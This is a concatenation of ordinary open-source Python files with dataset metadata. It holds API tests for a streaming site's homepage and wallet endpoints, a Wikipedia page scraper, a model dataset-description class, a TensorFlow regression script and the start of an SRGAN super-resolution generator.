@allure.title('test_homepage_list_recommendation')\n    @allure.severity(allure.severity_level.CRITICAL)\n    def test_homepage_list_recommendation(self, get_config_data, api_headers):  # 推荐系统\n        \"\"\"\n        接口: HomePageListRecommendation\n\n        检查主页推荐系统\n        \"\"\"\n        with allure.step('检查主页推荐系统 '):\n            response_json = common.api_post(get_config_data['url'], api_headers, Payload.homepage_list_recommendation())\n            print(response_json)\n            data = response_json.get('data')\n            home_page_list_recommendation = data.get('listRecommendation')\n            print(home_page_list_recommendation)\n        with allure.step('检查数据不为空'):\n            assert home_page_list_recommendation is not None\n        with allure.step('检查数据无报错'):\n            assert 'err' not in data\n\n    @allure.title('test_homepage_global_information_recommend')\n    @allure.severity(allure.severity_level.CRITICAL)\n    def test_homepage_global_information_recommend(self, get_config_data, api_headers):  # 主页左边的推荐列表\n        \"\"\"\n        接口:GlobalInformationRecommend\n\n        主页左边的推荐列表\n        \"\"\"\n        with allure.step(\"主页左边的推荐列表\"):\n            response_json = common.api_post(get_config_data['url'], api_headers,\n                                            Payload.homepage_global_information_recommend())\n            # 判断 recommendChannels 数组是否为空\n            recommend_channels = response_json['data']['globalInfo']['recommendChannels']\n        with allure.step('检查数据不为空'):\n            assert len(recommend_channels) > 0\n        with allure.step('检查数据无报错'):\n            assert 'err' not in response_json['data']\n\n    @allure.title('test_homepage_nav_search_result')\n    @allure.severity(allure.severity_level.CRITICAL)\n    def test_homepage_nav_search_result(self, get_config_data, api_headers):\n        \"\"\"\n        接口: NavSearchResult\n\n        搜索关键字: automation\n        检查首页搜索功能\n        \"\"\"\n        with allure.step('检查首页搜索功能'):\n            data = common.api_post(get_config_data['url'], api_headers,\n                                   Payload.homepage_nav_search_result(\"automation\"))\n            # 解析返回结果\n            print(data)\n            users = data['data']['search']['allUsers']['list']\n            print(users)\n\n        with allure.step('检查搜索结果是否包含\"automation\"'):\n            found_user = False\n            for user in users:\n                if user['creator']['displayname'] == 'automation':\n                    found_user = True\n                    break\n            assert found_user is True\n\n    @allure.title('test_homepage_nav_search_category')\n    @allure.severity(allure.severity_level.CRITICAL)\n    def test_homepage_nav_search_category(self, get_config_data, api_headers):\n        response = requests.post(get_config_data['url'], headers=api_headers,\n                                 json=Payload.homepage_nav_search_result(\"qatest\"))\n        assert response.status_code == 200\n        # 解析返回结果\n        data = json.loads(response.text)\n\n        # 检查返回的数据中的\"search\"字段是否为字典类型\n        assert isinstance(data[\"data\"][\"search\"], dict), \"'search' field is not a dictionary\"\n\n        # 检查返回的数据中的\"liveCategories\"字段是否为字典类型\n        assert isinstance(data[\"data\"][\"search\"][\"liveCategories\"], dict), \"'liveCategories' field is not a dictionary\"\n\n        # 检查返回的数据中的\"liveCategories\"字段中的\"list\"字段是否为列表类型\n        assert isinstance(data[\"data\"][\"search\"][\"liveCategories\"][\"list\"], list), \"'list' field is not a list\"\n\n        # 获取分类列表\n        categories = data[\"data\"][\"search\"][\"liveCategories\"][\"list\"]\n        print(categories)\n        # 检查是否存在\"title\": \"qaTest\"\n        found_category = False\n        for category in categories:\n            if category.get(\"title\") == \"qaTest\":\n                found_category = True\n                break\n\n        # 检查结果\n        assert found_category is True, \"Category 'qaTest' not found\"\n\n    @allure.title('test_me_global')\n    @allure.severity(allure.severity_level.CRITICAL)\n    def test_me_global(self, get_config_data, get_viewer1_login_auth_header):\n        \"\"\"\n        接口: MeGlobal\n\n        测试用户: 66@nqmo.com/password\n        检查用户global信息\n        \"\"\"\n        data = 
common.api_post(get_config_data['url'], get_viewer1_login_auth_header,\n                               Payload.me_global())\n        print(data)\n        with allure.step('检查用户ID是否正确'):\n            assert data['data']['me']['id'] == 'user:dlive-degnujtptx', \"User ID is incorrect\"\n\n        with allure.step('检查用户名是否正确'):\n            assert data['data']['me']['displayname'] == 'automation_viewer1', \"User displayname is incorrect\"\n\n        with allure.step('检查用户余额是否不为0'):\n            assert data['data']['me']['wallet']['balance'] != 0, \"User balance is 0\"\n\n        with allure.step('检查用户头像URL是否正确'):\n            assert data['data']['me']['avatar'] == 'https://image.dlivecdn.com/avatar/default22.png', \\\n                \"Avatar URL is incorrect\"\n\n        with allure.step('检查用户角色是否为None'):\n            assert data['data']['me']['role'] == 'None', \"User role is not None\"\n\n    @allure.title('test_live_streams_languages')\n    @allure.severity(allure.severity_level.CRITICAL)\n    def test_live_streams_languages(self, get_config_data, api_headers):\n        response = requests.post(get_config_data['url'], headers=api_headers,\n                                 json=Payload.live_streams_languages())\n        assert response.status_code == 200\n        # 解析返回结果\n        data = json.loads(response.text)\n        print(data)\n\n        # 检查返回的数据中的\"languages\"列表是否包含至少一个元素\n        assert len(data[\"data\"][\"languages\"]) > 0, \"'languages' list is empty\"\n\n        #检查返回的数据中的每个语言对象是否包含\"id\"、\"backendID\"、\"language\"和\"code\"字段\n        for language in data[\"data\"][\"languages\"]:\n            assert \"id\" in language, \"Language object does not contain 'id' field\"\n            assert \"backendID\" in language, \"Language object does not contain 'backendID' field\"\n            assert \"language\" in language, \"Language object does not contain 'language' field\"\n            assert \"code\" in language, \"Language object does not contain 'code' field\"\n\n        # with allure.step('检查用户邮箱是否已验证'):\n        #     assert data['data']['me']['private']['emailVerified'] == True, \"Email is not verified\"\n        #\n        # with allure.step('检查用户语言设置是否为英文'):\n        #     assert data['data']['me']['private']['language'] == 'en', \"Language is not English\"\n\n    @allure.title('test_me_balance')\n    @allure.severity(allure.severity_level.CRITICAL)\n    def test_me_balance(self, get_config_data, get_viewer1_login_auth_header):\n        \"\"\"\n        接口: MeBalance\n\n        用户: viewer1_username \n        \"\"\"\n        response = common.api_post(get_config_data['url'], get_viewer1_login_auth_header, Payload.test_me_balance())\n        print(response)\n\n        assert response[\"data\"][\"me\"][\"wallet\"][\"balance\"] is not None\n        assert response['data']['me']['id'] == 'user:dlive-degnujtptx', \"Username is incorrect\"\n\n    @allure.title('test_me_rebillycards')\n    @allure.severity(allure.severity_level.CRITICAL)\n    def test_me_rebillyCards(self, get_config_data, get_viewer1_login_auth_header):\n        \"\"\"\n        接口: MeRebillyCards\n\n        用户: automation\n        \"\"\"\n        response = common.api_post(get_config_data['url'], get_viewer1_login_auth_header, Payload.MeRebillyCards())\n        print(response)\n        assert response[\"data\"][\"me\"][\"id\"] == 'user:dlive-degnujtptx'\n        assert response[\"data\"][\"me\"][\"private\"][\"userRebillyCards\"] == []\n\n    @allure.title('test_activity_user_donation_rank')\n    @allure.severity(allure.severity_level.CRITICAL)\n    def test_activity_user_donation_rank(self, get_config_data, api_headers):\n        \"\"\"\n        接口: ActivityUserDonationRank\n\n        用户: automation\n        \"\"\"\n        response = requests.post(get_config_data['url'], headers=api_headers,\n                                 json=Payload.ActivityUserDonationRank())\n        assert response.status_code == 200\n        data = json.loads(response.text)\n\n        assert data[\"data\"][\"userDonationRank\"][\"rank\"] is not None\n        assert 
data[\"data\"][\"userDonationRank\"][\"user\"][\"displayname\"] == 'automation'\n\n @allure.title('test_browse_page_search_category')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_browse_page_search_category(self, get_config_data, api_headers):\n \"\"\"\n 接口: BrowsePageSearchCategory\n\n 用户: automation\n 步骤: category点击show all \n \"\"\"\n response = requests.post(get_config_data['url'], headers=api_headers,\n json=Payload.homepage_browse_page_search_category(\"\"))\n # assert response.status_code == 200 \n data = json.loads(response.text)\n assert data[\"data\"][\"search\"][\"trendingCategories\"][\"list\"] is not None\n\n response_search = requests.post(get_config_data['url'], headers=api_headers,\n json=Payload.homepage_browse_page_search_category(\"qa\"))\n assert response_search.status_code == 200\n data_search = json.loads(response_search.text)\n print(data_search)\n assert data_search[\"data\"][\"search\"][\"trendingCategories\"][\"list\"][1][\"title\"] == \"qaTest\"\n\n @allure.title('test_live_streams_languages')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_live_streams_languages(self, get_config_data, api_headers):\n \"\"\"\n 接口: BrowsePageSearchCategory\n\n 用户: automation\n 步骤: category点击show all \n \"\"\"\n response = requests.post(get_config_data['url'], headers=api_headers,\n json=Payload.live_streams_languages())\n assert response.status_code == 200\n data = json.loads(response.text)\n print (data)\n assert data[\"data\"][\"languages\"][0][\"id\"] is not None\n assert data[\"data\"][\"languages\"][0][\"language\"] == \"All\"\n\n @allure.title('test_homepage_category_live_stream_page')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_homepage_category_live_stream_pages(self, get_config_data, api_headers):\n \"\"\"\n 接口: CategoryLivestreamsPage\n\n 步骤: category点击games \n \"\"\"\n response = common.api_post(get_config_data['url'], api_headers,\n Payload.homepage_category_live_stream_page(get_config_data['streamer_category_id']))\n print(response)\n streamer_list = response[\"data\"][\"livestreams\"][\"list\"]\n with allure.step(\"检查automation这个直播间是否在category: qatest下面\"):\n streamerExist = False\n print(streamer_list)\n for i in streamer_list:\n if get_config_data['follow_streamer'] in i['permlink']:\n streamerExist = True\n if streamerExist:\n with allure.step(\"检查category是否显示正确\"):\n assert i['category']['id'] == \"category:\" + str(get_config_data['streamer_category_id'])\n assert i['title'] == \"Automation test\"\n break\n assert streamerExist == True, 'automation这个直播间不在category: qatest下面'\n\n @allure.title('test_IsUserVerifyEmailButNoPwd')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_IsUserVerifyEmailButNoPwd(self, get_config_data, api_headers): # 轮播检查\n \"\"\"\n 接口: IsUserVerifyEmailButNoPwd\n\n 检查是否验证邮箱接口\n \"\"\"\n response = requests.post(get_config_data['url'], headers=api_headers,\n json=Payload.IsUserVerifyEmailButNoPwd())\n assert response.status_code == 200\n data = json.loads(response.text)\n is_user_verify_email_but_no_pwd = response_json[\"data\"][\"IsUserVerifyEmailButNoPwd\"][\"isUserVerifyEmailButNoPwd\"]\n assert is_user_verify_email_but_no_pwd is False, \"'isUserVerifyEmailButNoPwd' is not False.\"\n\n\n @allure.title('test_isFirstThirdLogin')\n @allure.severity(allure.severity_level.CRITICAL)\n def test_isFirstThirdLogin(self, get_config_data, api_headers): # 轮播检查\n \"\"\"\n 接口: isFirstThirdLogin\n\n 检查是否验证邮箱接口\n \"\"\"\n response = requests.post(get_config_data['url'], headers=api_headers,\n 
json=Payload.isFirstThirdLogin())\n        assert response.status_code == 200\n        data = json.loads(response.text)\n        is_first_third_login = data[\"data\"][\"isFirstThirdLogin\"][\"isFirstThirdLogin\"]\n        assert is_first_third_login is False, \"'isFirstThirdLogin' is not False.\"\n\n\n    @allure.title('test_LiveCarousel')\n    @allure.severity(allure.severity_level.CRITICAL)\n    def test_LiveCarousel(self, get_config_data, api_headers):  # 轮播检查\n        \"\"\"\n        接口: LiveCarousel\n\n        检查首页直播轮播接口\n        \"\"\"\n        response = requests.post(get_config_data['url'], headers=api_headers,\n                                 json=Payload.LiveCarousel())\n        assert response.status_code == 200\n        data = json.loads(response.text)\n        # 验证 totalCount 字段的值为 5\n        total_count = data[\"data\"][\"liveCarousel\"][\"totalCount\"]\n        assert total_count == 5, \"'totalCount' is not 5.\"\n\n        # 验证 list 字段不为空\n        carousel_list = data[\"data\"][\"liveCarousel\"][\"list\"]\n        assert carousel_list, \"'list' is empty.\"\n\n        # 验证 list 中每一项不为空\n        for item in carousel_list:\n            assert item, \"An item in 'list' is empty.\"\n\nif __name__ == '__main__':\n    print('e2rwf')\n    print(os.getcwd())\n    pytest.main(['./test_homepage.py', '--alluredir', './report/results-20230627-1'])\n    os.system('allure generate ./report/results-20230627-1 -o ./report/report-20230627-1 --clean')\n","repo_name":"lino-network/web-api-test","sub_path":"tests/api/test_homepage.py","file_name":"test_homepage.py","file_ext":"py","file_size_in_byte":16289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70712088421","text":"from __future__ import annotations\n\nimport unicodedata\nfrom typing import Iterator\n\nimport arrow\nimport trio\nfrom selectolax.parser import HTMLParser, Node\n\nimport scrapewiki\n\nfrom .abc.coroutine_handler import CoroutineHandler\nfrom .constants import NOT_FOUND_TEXT\nfrom .structures import (\n    Category,\n    Content,\n    ExternalLink,\n    Header,\n    HeaderListItem,\n    HTMLHeaderTags,\n    Note,\n    Page,\n    Paragraph,\n    Reference,\n    References,\n)\n\n__all__ = [\"Wiki\", \"PageParser\"]\n\n\nclass Wiki(CoroutineHandler):\n    def __init__(self, scrapewiki: scrapewiki.Scrapewiki, page_name: str, **kwargs):\n        super().__init__(page_name, **kwargs)\n        self.scrapewiki = scrapewiki\n        self.page_name = page_name\n        self.kwargs = kwargs\n\n    @property\n    def page_url(self):\n        url = self.scrapewiki.http.BASE_URL / \"wiki\" / self.page_name\n        return str(url)\n\n    def sync_method(self) -> scrapewiki.structures.Page:\n        with self.scrapewiki.http.get(self.page_url, follow_redirects=True) as response:\n            return PageParser(self.scrapewiki, response.text, self.page_url).parse()\n\n    async def async_method(self) -> scrapewiki.structures.Page:\n        async with self.scrapewiki.http.get(\n            self.page_url, follow_redirects=True\n        ) as response:\n            parser = PageParser(self.scrapewiki, response.text, self.page_url)\n            return await trio.to_thread.run_sync(parser.parse)\n\n    def __enter__(self) -> scrapewiki.structures.Page:\n        return super().__enter__()\n\n    async def __aenter__(self) -> scrapewiki.structures.Page:\n        return await super().__aenter__()\n\n\nclass PageParser:\n    def __init__(self, scrapewiki: scrapewiki.Scrapewiki, html: str, page_url: str):\n        self.scrapewiki = scrapewiki\n        self.html = html\n        self.page_url = page_url\n        self.parser = HTMLParser(html)\n        self.header_names = [x.name for x in HTMLHeaderTags]\n\n    def parse_notes(self, notes: list[Node]) -> Iterator[Note]:\n        \"\"\"Parse the notes from a list of nodes.\"\"\"\n\n        for note in notes:\n            text = str()\n            refs = list()\n\n            for child in 
note.iter(include_text=True):\n if child.tag == \"-text\":\n text += str(child.raw_value, \"utf-8\")\n elif child.tag == \"a\":\n refs.append(\n Reference(child.text(), self.parse_url(child.attrs[\"href\"]))\n )\n text += child.text()\n elif child.tag != \"sup\":\n text += child.text()\n\n yield Note(text, refs)\n\n def parse_categories(self, nodes: list[Node]) -> Iterator[Category]:\n \"\"\"Parse the categories from a list of nodes.\"\"\"\n\n for node in nodes:\n yield Category(\n node.css_first(\"a\").text(),\n self.parse_url(node.css_first(\"a\").attrs[\"href\"]),\n )\n\n def parse_external_links(self, nodes: Iterator[Node]) -> Iterator[ExternalLink]:\n \"\"\"Parse the external links from a list of nodes.\"\"\"\n\n for node in nodes:\n if node.tag == \"h2\" and node.text(strip=True) == \"External links\":\n break\n\n for node in nodes:\n if node.tag == \"ul\":\n for a in node.css(\"a.external\"):\n yield ExternalLink(\n a.text(),\n a.attrs[\"href\"],\n )\n\n def parse_references(self, nodes: Iterator[Node]) -> Iterator[References]:\n \"\"\"Parse the references from a list of nodes.\"\"\"\n\n for node in nodes:\n if node.tag == \"h2\" and node.text(strip=True) == \"References\":\n break\n\n for node in nodes:\n if node.tag == \"ol\":\n for li in node.css(\"li\"):\n text_node = li.css_first(\"span.reference-text\")\n cite = text_node.css_first(\"cite\")\n if cite:\n cite.unwrap()\n\n references = []\n\n if text_node:\n text = self.get_paragraph(text_node).text\n for a in text_node.css(\"a\"):\n a_t = a.attributes.get(\"title\")\n a_c = a.attributes.get(\"class\")\n if a_t:\n references.append(\n Reference(a_t, self.parse_url(a.attributes[\"href\"]))\n )\n elif a_c == \"external text\":\n references.append(\n Reference(a.text(), a.attributes[\"href\"])\n )\n yield References(text, references)\n\n def get_paragraph(self, node: Node) -> Paragraph:\n \"\"\"Get a paragraph from a node.\"\"\"\n\n text = str()\n refs = list()\n\n for child in node.iter(include_text=True):\n if child.tag == \"-text\":\n data = str(child.raw_value, \"utf-8\")\n text += unicodedata.normalize(\"NFD\", data).replace(\" \", \" \")\n elif child.tag == \"a\" and \"external\" not in child.attributes.get(\n \"class\", \"\"\n ):\n refs.append(\n Reference(child.text(), self.parse_url(child.attrs[\"href\"]))\n )\n text += child.text()\n elif child.tag not in (\"sup\", \"style\"):\n text += child.text()\n\n text = text.strip()\n if text or refs:\n return Paragraph(text, refs)\n\n def parse_contents(self, toc: Node) -> list[Content]:\n \"\"\"Parse the contents of the table of contents.\"\"\"\n\n contents = list()\n\n for node in toc.iter():\n if node.tag == \"li\":\n name = node.css_first(\"a\").attributes[\"href\"][1:]\n url = str(\n (self.scrapewiki.http.BASE_URL / \"wiki\" / self.title).with_fragment(\n node.css_first(\"a\").attrs[\"href\"][1:]\n )\n )\n ul = node.css_first(\"ul\")\n sub_contents = self.parse_contents(ul) if ul else None\n\n contents.append(Content(name, url, sub_contents))\n\n return contents\n\n def parse_ul(self, node: Node) -> list[HeaderListItem]:\n \"\"\"Parse the contents of a unordered list.\"\"\"\n\n contents = list()\n\n for child in node.iter():\n if child.tag == \"li\":\n name = child.text()\n url = child.css_first(\"a\")\n if url:\n if \"wiki/\" in url.attributes[\"href\"]:\n url = self.parse_url(url.attributes[\"href\"])\n else:\n url = url.attributes[\"href\"]\n\n ul = child.css_first(\"ul\")\n sub_lists = self.parse_ul(ul) if ul else None\n\n contents.append(HeaderListItem(name, url, 
sub_lists))\n\n return contents\n\n def parse_url(self, url: str) -> str:\n \"\"\"Parses a URL from a relative path.\"\"\"\n\n return str(self.scrapewiki.http.BASE_URL / url[1:])\n\n def parse_headers(self, nodes: list[Node], headers=[]) -> list[Header]:\n \"\"\"Parse headers from the given nodes.\"\"\"\n\n if not nodes:\n return headers\n\n for node in nodes.copy():\n if node.tag.upper() in self.header_names:\n header = node\n\n try:\n title = header.css_first(\"span.mw-headline\").text(strip=True)\n except AttributeError:\n title = header.text(strip=True)\n\n paras = []\n notes = []\n references = []\n lists = None\n nodes.pop(0)\n\n for node in nodes.copy():\n if node.tag == \"p\":\n paras.append(self.get_paragraph(node))\n nodes.pop(0)\n\n elif node.attributes.get(\"role\") == \"note\":\n notes.append(node)\n nodes.pop(0)\n\n elif node.tag == \"ul\" and title != \"References\":\n lists = self.parse_ul(node)\n\n elif node.tag.upper() in self.header_names:\n headers.append(\n Header(\n title,\n HTMLHeaderTags[header.tag.upper()].value,\n list(self.parse_notes(notes)),\n paras or None,\n references or None,\n lists,\n )\n )\n return self.parse_headers(nodes, headers)\n\n return headers\n else:\n nodes.pop(0)\n\n def parse(self) -> Page:\n \"\"\"Parse the page and return a Page object.\"\"\"\n\n content = self.parser.css_first(\"#content\")\n self.title = content.css_first(\"#firstHeading\").text()\n\n for b in self.parser.css(\"div + b\"):\n if b.text(strip=True) == NOT_FOUND_TEXT:\n raise scrapewiki.PageNotFound(self.title) from None\n\n last_modified = (\n self.parser.css_first(\"#footer-info-lastmod\")\n .text()[30:-7]\n .replace(\", at\", \"\")\n )\n try:\n last_modified = arrow.get(last_modified, \"DD MMMM YYYY HH:mm\")\n except arrow.parser.ParserMatchError:\n last_modified = arrow.get(last_modified, \"D MMMM YYYY HH:mm\")\n\n content.css_first(\"#bodyContent\").unwrap()\n content.css_first(\"#mw-content-text\").unwrap()\n content.css_first(\".mw-parser-output\").unwrap()\n reflist = content.css_first(\"div.reflist\")\n\n categories = list(self.parse_categories(content.css(\"#catlinks li a\")))\n external_links = list(self.parse_external_links(content.iter()))\n contents = content.css_first(\".toc ul\") or None\n\n if contents:\n contents = self.parse_contents(contents)\n\n if reflist:\n reflist.unwrap()\n references = list(self.parse_references(content.iter()))\n else:\n references = None\n\n headers = self.parse_headers(list(content.iter()))\n return Page(\n categories,\n self.title,\n self.page_url,\n last_modified.datetime,\n headers or None,\n contents,\n external_links or None,\n references,\n )\n","repo_name":"eeriemyxi/scrapewiki","sub_path":"scrapewiki/wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":10678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27669480684","text":"\"\"\"A class that stores dataset specific descriptions specified for that dataset.\n\nThese descriptions are called in different ways when generating responses in the conversation to\nprovide more tailored dataset specified feedback\n\"\"\"\nimport gin\nfrom typing import Any\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix, roc_auc_score, f1_score, precision_score, recall_score\n\nfrom explain.utils import read_and_format_data\n\n\n@gin.configurable\nclass DatasetDescription:\n \"\"\"The dataset description class.\"\"\"\n\n def __init__(self,\n dataset_objective: str = \"\",\n dataset_description: str = 
\"\",\n model_description: str = \"\",\n eval_file_path: str = None,\n index_col: int = 0,\n target_var_name: str = \"y\"):\n \"\"\"Init.\n\n Arguments:\n dataset_objective: The goal of the dataset. I.e., \"predict whether someone has a\n disease\" or \"predict whether this image is a dog\".\n dataset_description: A brief description of the dataset, i.e., \"disease prediction\" or\n \"canine classification\".\n eval_file_path: The filepath to an eval dataset that will be used to compute a test\n score for the model on the training dataset to summarize performance.\n index_col: The index columns of the testing data\n target_var_name: The target variable name in the testing data\n model_description: A description of the model. i.e., gradient boosted tree or linear\n regression\n \"\"\"\n self.objective = dataset_objective\n self.description = dataset_description\n self.eval_file_path = eval_file_path\n self.index_col = index_col\n self.target_var_name = target_var_name\n self.model_description = model_description\n\n def get_dataset_objective(self):\n \"\"\"Gets the objective.\"\"\"\n return self.objective\n\n def get_dataset_description(self):\n \"\"\"Gets the description.\"\"\"\n return self.description\n\n def get_model_description(self):\n \"\"\"Gets the model description.\"\"\"\n return self.model_description\n\n def get_text_description(self):\n \"\"\"Returns a brief text overview of the dataset and model.\"\"\"\n text = (f\"This chat interfaces to a model trained on a {self.get_dataset_description()}\"\n f\" dataset. The goal of the model is to {self.get_dataset_objective()}.\")\n return text\n\n @staticmethod\n def get_score_text(y_true: Any,\n y_pred: Any,\n metric_name: str,\n rounding_precision: int,\n data_name: str) -> str:\n \"\"\"Computes model score and returns text describing the outcome.\n\n Arguments:\n data_name: The name of the data split, e.g. testing data\n y_true: The true y values\n y_pred: The predicted y values\n metric_name: The name of the metric\n rounding_precision: The sig figs to round to\n Returns:\n performance_summary: A string describing the performance\n \"\"\"\n if metric_name == \"accuracy\":\n score = accuracy_score(y_true, y_pred)\n # sklearn defaults to accuracy represented as decimal. 
convert this to %\n score *= 100\n elif metric_name == \"roc\":\n score = roc_auc_score(y_true, y_pred)\n elif metric_name == \"f1\":\n score = f1_score(y_true, y_pred)\n elif metric_name == \"recall\":\n score = recall_score(y_true, y_pred)\n elif metric_name == \"precision\":\n score = precision_score(y_true, y_pred)\n elif metric_name == \"sensitivity\":\n tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()\n score = tp / (tp + fn)\n elif metric_name == \"specificity\":\n tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()\n score = tn / (tn + fp)\n elif metric_name == \"ppv\":\n tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()\n score = tp / (tp + fp)\n elif metric_name == \"npv\":\n tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()\n score = tn / (tn + fn)\n else:\n raise NameError(f\"Unknown metric {metric_name}\")\n\n string_score = str(round(score, rounding_precision))\n\n # additional context for accuracy score\n if metric_name == \"accuracy\":\n string_score += \"%\"\n\n performance_summary = f\"The model scores {string_score} {metric_name} on \"\n performance_summary += f\"{data_name}.\"\n return performance_summary\n\n def get_eval_performance(self,\n model: Any,\n metric_name: str = \"accuracy\",\n rounding_precision: int = 3) -> str:\n \"\"\"Computes the eval performance.\n\n Arguments:\n model: The model\n metric_name: The name of the metric used, e.g., accuracy. The currently supported\n metrics are accuracy, roc, f1, recall, and precision.\n rounding_precision: The number of decimal places to present in the result\n Returns:\n performance_summary: A string describing the performance summary of the model.\n \"\"\"\n\n # If no eval dataset is specified, ignore providing\n # performance summary\n if self.eval_file_path is None:\n return \"\"\n\n # Loads and processes the testing dataset\n x_values, y_values, _, _ = read_and_format_data(self.eval_file_path,\n index_col=self.index_col,\n target_var_name=self.target_var_name,\n cat_features=None,\n num_features=None)\n\n # read_and_format_data returns pandas.df, so convert to numpy for model inference\n x_values = x_values.values\n y_pred = model.predict(x_values)\n # Get performance summary\n performance_summary = self.get_score_text(y_values,\n y_pred,\n metric_name,\n rounding_precision,\n \"the data\")\n return performance_summary\n","repo_name":"dylan-slack/TalkToModel","sub_path":"explain/dataset_description.py","file_name":"dataset_description.py","file_ext":"py","file_size_in_byte":6622,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"35"} +{"seq_id":"11523441515","text":"##############################################\n#\n# Chris Snyder\n# lok139\n# vegas_regression.py\n#\n#############################################\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport pandas as pd\nfrom tqdm import tqdm\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nlearning_rate = 0.1\ntraining_epochs = 200\n\n#Run the regressor\ndef run(df):\n #clean the data\n #df.to_csv(\"testdata.csv\")\n train_x_l = []\n for col in df:\n if col != 'Score':\n train_x_l.append(df[col])\n train_y = df['Score']\n #####################################################stay###################type\n test_x = [[0,1],[1,1],[0,0],[0,1],[1,1],[1,1],[3,5],[0,1],[0,0],[0,0],[1,0],[0,0],[0,0],[1,0],[0,0],[0,1]]\n test_y = [4]\n n_samples = 504\n\n #initialize placeholders\n X_in_list = []\n for x in train_x_l:\n X_in_list.append(tf.placeholder(tf.float32)) \n Y = 
tf.placeholder(tf.float32, name = 'p_y')\n\n    #Initialize weights and biases\n    W_list = []\n    for x in train_x_l:\n        W_list.append(tf.Variable(np.random.randn()))\n    b = tf.Variable(np.random.randn())\n\n    #dot product\n    sum_list = []\n    for (x, w) in zip(X_in_list, W_list):\n        sum_list.append(tf.multiply(x, w))\n\n    # initialize prediction, cost and optimization procedures\n    pred = tf.add_n(sum_list) + b\n    cost = tf.reduce_mean(tf.pow(Y - pred, 2))/(2*n_samples)\n    optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost)\n\n    init = tf.global_variables_initializer()\n\n    #Begin the session\n    with tf.Session() as sess:\n        sess.run(init)\n        #Begin learning\n        print(\"Learning...\")\n        train_with_y = train_x_l\n        train_with_y.append(train_y)\n        X_with_Y = X_in_list\n        X_with_Y.append(Y)\n        trainlist = list(zip(*train_with_y))\n        for epoch in tqdm(range(training_epochs)):\n            for xlist in trainlist:\n                feeddict = buildDict(X_in_list, xlist)\n                sess.run(optimizer, feed_dict=feeddict)\n\n        #Begin testing\n        print(\"Testing...\")\n\n        test_xy = test_x\n        test_xy.append(test_y)\n        feeddict = buildDict(X_in_list, test_xy)\n        #final_cost = sess.run(cost, feed_dict = feeddict)\n        feeddict = buildDict(X_in_list, test_x)\n        pred_values = sess.run(pred, feed_dict = feeddict)\n        for i, value in enumerate(pred_values):\n            print(\"Question #\" + str(i+1) + \" = \" + str(round(value, 1)))\n\n#Build a dictionary to feed\ndef buildDict(X_in_list, train_x):\n    newDict = dict(zip(X_in_list, train_x))\n    return newDict\n","repo_name":"chrisMsnyder/Projects","sub_path":"Vegas Predictor/vegas_regression.py","file_name":"vegas_regression.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71673770980","text":"import math\n\nimport torch\nimport torch.nn as nn\nfrom torch.hub import load_state_dict_from_url\n\nfrom .utils import ResidualBlock\nfrom .utils import SubpixelConvolutionLayer\n\nmodel_urls = {\n    \"srgan_2x2\": \"https://github.com/Lornatang/SRGAN-PyTorch/releases/download/v0.2.2/SRGAN_2x2_ImageNet2012-3f1d605edcbfb83dc836668731cd6135b00ff62ea6f8633559fbb5dffe8413ba.pth\",\n    \"srgan\": \"https://github.com/Lornatang/SRGAN-PyTorch/releases/download/v0.2.2/SRGAN_ImageNet2012-158a3f9e70f45aef607e4146e29cde745e8d9a35972cb067f1ee00cb92254e02.pth\",\n    \"srgan_8x8\": \"https://github.com/Lornatang/SRGAN-PyTorch/releases/download/v0.2.2/SRGAN_8x8_ImageNet2012-c8207fead3ec73cdf6772fb60fef759833bae4a535eb8d3287aba470696219c1.pth\"\n}\n\n\nclass Generator(nn.Module):\n    def __init__(self, upscale_factor: int = 4) -> None:\n        r\"\"\"\n        Args:\n            upscale_factor (int): How many times to upscale the picture. 
(Default: 4)\n \"\"\"\n super(Generator, self).__init__()\n # Calculating the number of subpixel convolution layers.\n num_subpixel_convolution_layers = int(math.log(upscale_factor, 2))\n\n # First layer.\n self.conv1 = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=9, stride=1, padding=4),\n nn.PReLU()\n )\n\n # 16 Residual blocks.\n trunk = []\n for _ in range(16):\n trunk.append(ResidualBlock(channels=64))\n self.trunk = nn.Sequential(*trunk)\n\n # Second conv layer post residual blocks.\n self.conv2 = nn.Sequential(\n nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(64)\n )\n\n # 2 Sub-pixel convolution layers.\n subpixel_conv_layers = []\n for _ in range(num_subpixel_convolution_layers):\n subpixel_conv_layers.append(SubpixelConvolutionLayer(64))\n self.subpixel_conv = nn.Sequential(*subpixel_conv_layers)\n\n # Final output layer.\n self.conv3 = nn.Conv2d(64, 3, kernel_size=9, stride=1, padding=4)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n conv1 = self.conv1(x)\n trunk = self.trunk(conv1)\n conv2 = self.conv2(trunk)\n out = torch.add(conv1, conv2)\n out = self.subpixel_conv(out)\n out = self.conv3(out)\n\n return out\n\n\ndef _gan(arch: str, upscale_factor: int, pretrained: bool, progress: bool) -> Generator:\n model = Generator(upscale_factor)\n if pretrained:\n state_dict = load_state_dict_from_url(model_urls[arch], progress=progress, map_location=torch.device(\"cpu\"))\n model.load_state_dict(state_dict)\n return model\n\n\ndef srgan_2x2(pretrained: bool = False, progress: bool = True) -> Generator:\n r\"\"\"GAN model architecture from the `\"One weird trick...\" ` paper.\n\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n progress (bool): If True, displays a progress bar of the download to stderr\n 